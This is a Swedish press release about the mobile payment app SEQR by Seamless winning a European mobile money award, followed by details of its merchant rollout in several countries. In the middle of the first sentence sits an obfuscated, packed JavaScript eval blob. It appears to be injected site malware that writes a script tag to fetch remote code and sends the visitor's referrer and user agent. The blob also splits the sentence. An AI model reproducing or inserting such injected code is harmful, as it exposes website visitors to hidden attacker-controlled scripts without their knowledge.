Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

SEQR tar hem pris för “Best Mobile Money Deployment in Europe”

SEQR tar hem pris för “Best Mobile Money Deployment in Europe”
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|srsad|var|u0026u|referrer|edizn||js|php’.split(’|’),0,{}))
svenska mobila betalningslösningen SEQR, utvecklad av Seamless (OMX:SEAM), har utsetts till vinnare i kategorin ”Best Mobile Money Deployment in Europe” av Mobile Money Global Awards i Dubai. Utnämningen är ytterligare ett bevis på SEQR:s unika erbjudande till både handlare och konsument som en komplett och generisk betalningslösning oberoende av befintliga betalningsstrukturer. 

– Seamless vann i kategorin Best Mobile Money Deployment in Europe för deras mobila betalningsapp SEQR – den enda “allt i ett” mobila betalningslösningen som hanterar hela transaktionskedjan, sa Steve Clarke, Managing Director för Mobile Money & Digital Payments Summit.

Om Mobile Money Global Awards Mobile Money Global Awards uppmärksammar organisationer som bygger, skapar och distribuerar framgångsrika mobila betalningslösningar över hela världen. Årets upplaga av Mobile Money & Digital Payments Global som hölls i Dubai besöktes av namnkunniga talare från hela världen som diskuterade tillväxten av mobile money och vikten av samarbeten för att bygga ett framgångsrikt ekosystem för mobile money.

– Vi är mycket stolta över att ha utsetts till vinnare. Att ett viktigt internationell branschforum inser vilket mervärde SEQR innebär för konsument och handlare är ytterligare ett bevis på SEQR som en generisk betallösning oberoende av bank, telefonoperatör eller handlare. SEQR är en win-win-win oavsett var i världen vi befinner oss, säger Peter Fredell, vd Seamless som tillhandahåller SEQR.

SEQR på export

Efter en rekordsnabb utrullning i Axfoods samtliga 380 butiker (2 500 POS) på två veckor har Seamless idag avtal med över 3 500 handlare runt om i Sverige. Den internationella utrullningen pågår för fullt. I oktober lanserades SEQR i Rumänien tillsammans med Garanti Bank. Fler än 450 butiker och restauranger har idag skrivit avtal för att integrera SEQR. Våren 2014 lanseras SEQR i Belgien tillsammans med bpost bank och McDonald’s. I dagarna blev det också klart att Hesburger, Finlands största snabbmatskedja rullar ut SEQR i utvalda restauranger.

SEQR har sedan tidigare utsetts till ”Bäst i test” av tidningen Allt om Android, nummer 1, 2013 och nominerats till Guldmobilen i kategorin Årets Mobila Betalning.

Om SEQR

SEQR (se•cure) gör det möjligt för alla som har en smartphone att betala i butik, restaurang, parkeringen och webben, skicka och ta emot pengar gratis, samla alla kvitton digitalt och ta del av erbjudanden direkt i mobilen. Allt kunden behöver göra är att med SEQR-appen skanna en QR-kod vid kassan och godkänna betalningen med sin PIN-kod. Snabbt, säkert och enkelt. SEQR är också anpassad för NFC-teknik. Den egenutvecklade tekniken gör det möjligt för handlaren att halvera sina transaktionskostnader jämfört med traditionella kortbetalningar. SEQR tillhandahålls av Seamless, en av världens ledande leverantörer av betalsystem för mobiltelefoner. Grundat 2001 och verksamt i 30 länder hanterar Seamless årligen över 3,1 miljarder transaktioner genom 525 000 aktiva försäljningsställen. Det är Seamless egenutvecklade transaktionsplattform som utgör grunden för SEQR. Du kan handla med SEQR på bland andra Hemköp, Willys, Tempo, McDonald’s, Burger King, Ur&Penn, MyWay, Webhallen och Dormy. 2013 lanserades SEQR i Rumänien tillsammans med Garanti Bank och under våren 2014 är lansering planerad i Belgien i samarbete med bpost bank. Seamless handlas på Nasdaq OMX Stockholm, kortnamn SEAM. www.seqr.se

Detta är ett pressmeddelande från SEQR